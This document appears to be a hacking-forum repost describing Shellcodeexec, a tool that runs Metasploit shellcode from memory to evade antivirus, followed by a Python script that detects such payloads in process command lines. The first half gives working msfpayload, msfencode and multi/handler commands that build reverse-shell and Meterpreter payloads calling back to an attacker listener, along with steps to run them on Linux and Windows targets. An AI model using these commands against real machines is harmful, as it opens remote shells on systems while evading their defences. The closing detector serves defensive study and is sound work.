Shellcodeexec: Execute Metasploit Payloads Bypassing Antivirus Prot

Picture this: you are performing a penetration test and you find an unpatched machine. The machine is so ill-patched that you can even run the SMBv2 (CVE-2009-3103) exploit via Metasploit, yet your execute-from-memory Meterpreter script fails you. The antivirus flags you and your exploit runs unsuccessfully. msfencode does not help either! What do you do then? Use Shellcodeexec, a script that executes a sequence of opcodes in memory. Its current features include:
The author presents clear examples of how to run the tool. We have listed them below:

1. Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example, for a Linux target:

    $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

   Or for a Windows target:

    $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

2. Start the Metasploit multi/handler listener on your machine. For example, for a Linux target:

    $ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

   Or for a Windows target:

    $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E

3. Execute the alphanumeric-encoded shellcode with this tool. For example, on the Linux target:

    $ ./shellcodeexec <msfencode's alphanumeric-encoded payload>

   Or, on the Windows target:

    C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>

Download shellcodeexec (inquisb-shellcodeexec.zip) here.
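The procedure above hands the whole encoded payload to shellcodeexec as a command-line argument, which is also what makes it visible to a defender: a process whose arguments contain several hundred bytes of pure alphanumerics is unusual. The following Python script is an added example, not part of shellcodeexec or Metasploit, that scans a list of (pid, command line) pairs for such arguments. It assumes two things: the decoder stub string that x86/alpha_mixed emits when BufferRegister=EAX is set (taken from public analyses of the encoder and to be checked against the Metasploit version in use), and a minimum argument length of 200 as a tuning threshold. The process list it scans is constructed for the example.

```python
import random
import re

# Decoder stub that Metasploit's x86/alpha_mixed encoder emits at the start of
# its output when BufferRegister=EAX is set ("P" = push eax, "Y" = pop ecx,
# then a run of "I" = dec ecx). Assumed from public analyses of the encoder;
# verify the exact string against your Metasploit version before relying on it.
ALPHA_MIXED_EAX_STUB = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"

# A real encoded stager is several hundred characters; shorter arguments are
# unlikely to be a payload. The threshold is a tuning choice, not a fact.
MIN_ALNUM_ARG = 200

ALNUM_ONLY = re.compile(r"^[A-Za-z0-9]+$")


def classify_argument(arg):
    """Return a reason string if an argument looks like alphanumeric
    shellcode, otherwise None."""
    if ALPHA_MIXED_EAX_STUB in arg:
        return "alpha_mixed decoder stub"
    if len(arg) >= MIN_ALNUM_ARG and ALNUM_ONLY.match(arg):
        # alpha_mixed output never contains '+', '/' or '=', so padded base64
        # tokens (the usual false positive) are already rejected by the regex.
        # Require all three character classes to avoid flagging long hex or
        # all-lowercase identifiers.
        has_upper = any(c.isupper() for c in arg)
        has_lower = any(c.islower() for c in arg)
        has_digit = any(c.isdigit() for c in arg)
        if has_upper and has_lower and has_digit:
            return "long alphanumeric-only argument"
    return None


def scan_process_list(processes):
    """processes: iterable of (pid, command_line). Returns [(pid, reason)]."""
    findings = []
    for pid, cmdline in processes:
        # Skip argv[0]; only the arguments are candidate payloads.
        for arg in cmdline.split()[1:]:
            reason = classify_argument(arg)
            if reason:
                findings.append((pid, reason))
                break
    return findings


def _fake_alnum(n, seed):
    """Constructed filler standing in for an encoded payload body."""
    rng = random.Random(seed)
    alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    return "".join(rng.choice(alphabet) for _ in range(n))


# Constructed sample process list (not real telemetry).
SAMPLE_PROCESSES = [
    (1184, r"C:\Windows\System32\svchost.exe -k netsvcs"),
    (2210, r"C:\WINDOWS\Temp\shellcodeexec.exe " + ALPHA_MIXED_EAX_STUB + _fake_alnum(400, 1)),
    (2301, "./shellcodeexec " + _fake_alnum(350, 2)),
    (2455, "curl -H " + _fake_alnum(299, 3) + "="),  # base64-like, padded
    (2600, "notepad.exe report.txt"),
]

if __name__ == "__main__":
    for pid, reason in scan_process_list(SAMPLE_PROCESSES):
        print(f"pid {pid}: {reason}")
```

The stub match is the high-confidence signal; the length heuristic is a fallback for other alphanumeric encoders and will need tuning against the command lines seen on your own hosts.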
[ vBspiders.Com Network ]